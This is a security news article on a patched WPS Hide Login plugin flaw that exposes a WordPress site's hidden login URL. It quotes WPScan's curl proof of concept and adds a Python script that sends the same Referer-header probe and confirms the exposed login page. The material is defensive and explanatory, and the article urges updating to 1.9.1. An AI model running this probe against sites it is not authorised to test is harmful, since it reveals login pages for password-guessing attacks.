The WPS Hide Login WordPress plugin recently patched a vulnerability that exposed users' secret login pages. The flaw let an attacker defeat the plugin's entire purpose, which is to hide the login page, and so left the site open to the password-guessing attacks the hidden URL was meant to deflect.
WPS Hide Login
The WPS Hide Login security plugin moves the WordPress login page to a custom URL and makes the wp-admin directory inaccessible to visitors who are not logged in, so automated attacks against the default login page find nothing to attack.
More than one million websites use WPS Hide Login to add an extra layer of protection.
Defeating the bots that hammer a WordPress site's default login page does not strictly require a plugin. A simpler way to get much the same effect is to install WordPress in a directory with a random name.
The login bot then looks for the login page at its usual URL and finds nothing there, because the page actually lives at /random-name/wp-login.php instead of /wp-login.php.
Most login bots assume the WordPress login page is in its default location and never look for it elsewhere. The directory name is not a secret, though: the site's own links to its wp-content and wp-includes assets reveal it in the page source, so this only deters bots that never parse the HTML.
The WPS Hide Login plugin is most useful for sites that have WordPress installed in the web root, such as example.com/, where the login page would otherwise sit at the well-known /wp-login.php.
Vulnerability report
The vulnerability was first reported publicly on the plugin's support forum.
A user of the plugin reported that if the site's bare domain redirects to another host (for example to a subdomain), appending a specific admin file name to the redirecting URL causes the server to redirect straight to the hidden login URL, exposing it.
They explained it like this:
"For example, for the following domain: sub.domain.com. If domain.com is redirected to sub.domain.com, the following bypass exists:
Enter the URL domain.com and add /wp-admin/options.php; it then redirects to sub.domain.com/changedloginurl, you will see the login URL, and you can log in."
Proof of concept published by WPScan
WPScan, a WordPress security company, published a proof of concept: a single unauthenticated request that demonstrates the vulnerability is real.
The security researchers published:
"The plugin has a bug which allows setting a random referer string and sending a request to /wp-admin/options.php as an unauthenticated user.
Proof of concept
curl --referer "something" -sIXGET https://example.com/wp-admin/options.php
HTTP/2 302"
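The curl line sends a GET (-X GET) for /wp-admin/options.php with an arbitrary Referer header, and -sI prints only the response headers; on a vulnerable site the 302 carries a Location header pointing at the hidden login page. The script below reproduces that request in Python and adds the two checks a practitioner needs around it: it refuses to follow the redirect so the raw Location header can be inspected, and it confirms a candidate URL by looking for the WordPress login form fields (inputs named log and pwd) rather than trusting any redirect. This is an added example, not code from the page, WPScan, or the plugin authors; the target https://example.com, the Referer value "something", and the sample responses in demo() are constructed for illustration. A redirect to somewhere other than /wp-login.php is only a candidate: a patched site may redirect unauthenticated requests to a harmless page, which is why the form check follows.

```python
"""
Checker for the WPS Hide Login referer-header bypass (plugin versions before 1.9.1).

Added example, not code from the page, WPScan, or the plugin authors. It sends the
same unauthenticated GET /wp-admin/options.php with a Referer header that the curl
proof of concept sends, does NOT follow the redirect, and reads the Location header,
which on a vulnerable site points at the hidden login URL. The target
https://example.com, the Referer value and the responses in demo() are constructed.
"""
import re
import sys
import urllib.request
from urllib.error import HTTPError
from urllib.parse import urljoin, urlparse

PROBE_PATH = "/wp-admin/options.php"
REDIRECT_CODES = {301, 302, 303, 307, 308}
# The WordPress login form always carries these two input names.
LOGIN_FIELDS = (re.compile(r'name=["\']log["\']'), re.compile(r'name=["\']pwd["\']'))


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow 3xx responses so the raw Location header can be inspected."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(base_url, referer="something", timeout=10):
    """Send the proof-of-concept request. Returns (status, headers). Needs network access."""
    opener = urllib.request.build_opener(NoRedirect)
    req = urllib.request.Request(
        urljoin(base_url, PROBE_PATH),
        headers={"Referer": referer, "User-Agent": "wps-hide-login-check"},
    )
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, dict(resp.headers)
    except HTTPError as err:
        # With redirects disabled urllib raises on 3xx; the headers are still available.
        return err.code, dict(err.headers)


def header(headers, name):
    """Case-insensitive header lookup over a plain dict."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def classify(status, headers, base_url):
    """
    Turn the probe response into a verdict and the URL it points at:
      no-redirect  options.php answered directly (plugin absent, or request blocked)
      stock-login  bounced to /wp-login.php, so the login page is not hidden at all
      candidate    redirected somewhere else; on a vulnerable site this is the hidden
                   login URL, on a patched site it may be a harmless redirect, so
                   confirm with looks_like_wp_login_form() before reporting
    """
    location = header(headers, "Location")
    if status not in REDIRECT_CODES or not location:
        return "no-redirect", None
    target = urljoin(base_url, location)
    if urlparse(target).path.endswith("/wp-login.php"):
        return "stock-login", target
    return "candidate", target


def looks_like_wp_login_form(html):
    """True when the page contains the WordPress login form (inputs named log and pwd)."""
    return all(pattern.search(html) for pattern in LOGIN_FIELDS)


def demo():
    """Run classify() over constructed responses (not captured from any real site)."""
    base = "https://example.com"
    samples = {
        "vulnerable": (302, {"Location": "https://example.com/changedloginurl/"}),
        "not-hidden": (302, {"location": "/wp-login.php?redirect_to=%2Fwp-admin%2Foptions.php"}),
        "no-redirect": (200, {"Content-Type": "text/html; charset=UTF-8"}),
    }
    return {name: classify(status, hdrs, base) for name, (status, hdrs) in samples.items()}


if __name__ == "__main__":
    if len(sys.argv) < 2:
        for name, result in demo().items():
            print(f"{name:12} -> {result}")
        sys.exit(0)
    base = sys.argv[1].rstrip("/")
    status, hdrs = probe(base)
    verdict, target = classify(status, hdrs, base)
    print(f"HTTP {status} -> {verdict}: {target}")
    if verdict == "candidate":
        with urllib.request.urlopen(target, timeout=10) as page:
            body = page.read().decode("utf-8", "replace")
        confirmed = looks_like_wp_login_form(body)
        print("hidden login page exposed" if confirmed else "redirect target is not a login form")
```

Run it with no arguments to see the verdicts for the constructed samples, or with a site URL (only one you are authorised to test) to send the real probe. Because the candidate URL is confirmed by the presence of the login form fields, a patched install that merely redirects unauthenticated admin requests elsewhere is not reported as exposed.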
The US government's National Vulnerability Database rated the vulnerability High, with a CVSS score of 7.5 on the 0-to-10 scale, where 10 represents the most severe.
WPS Hide Login vulnerability has been patched
The publisher of the WPS Hide Login plugin has released an update that patches the vulnerability.
The fix is included in version 1.9.1.
According to the plugin's changelog:
"1.9.1
Fix: security issue where a bypass allowed unauthenticated users to get the login page by setting a random referer string through a curl request."
Sites running the plugin should update to version 1.9.1 or later; until then the login page is not actually hidden from anyone who knows the trick. Because the bypass is a single unauthenticated request, web server access logs showing 302 responses to /wp-admin/options.php from unfamiliar clients are a useful sign that someone has already probed for it.
Citations
US government National Vulnerability Database entry for the vulnerability
WPScan report: WPS Hide Login < 1.9.1 - Protection bypass with Referer header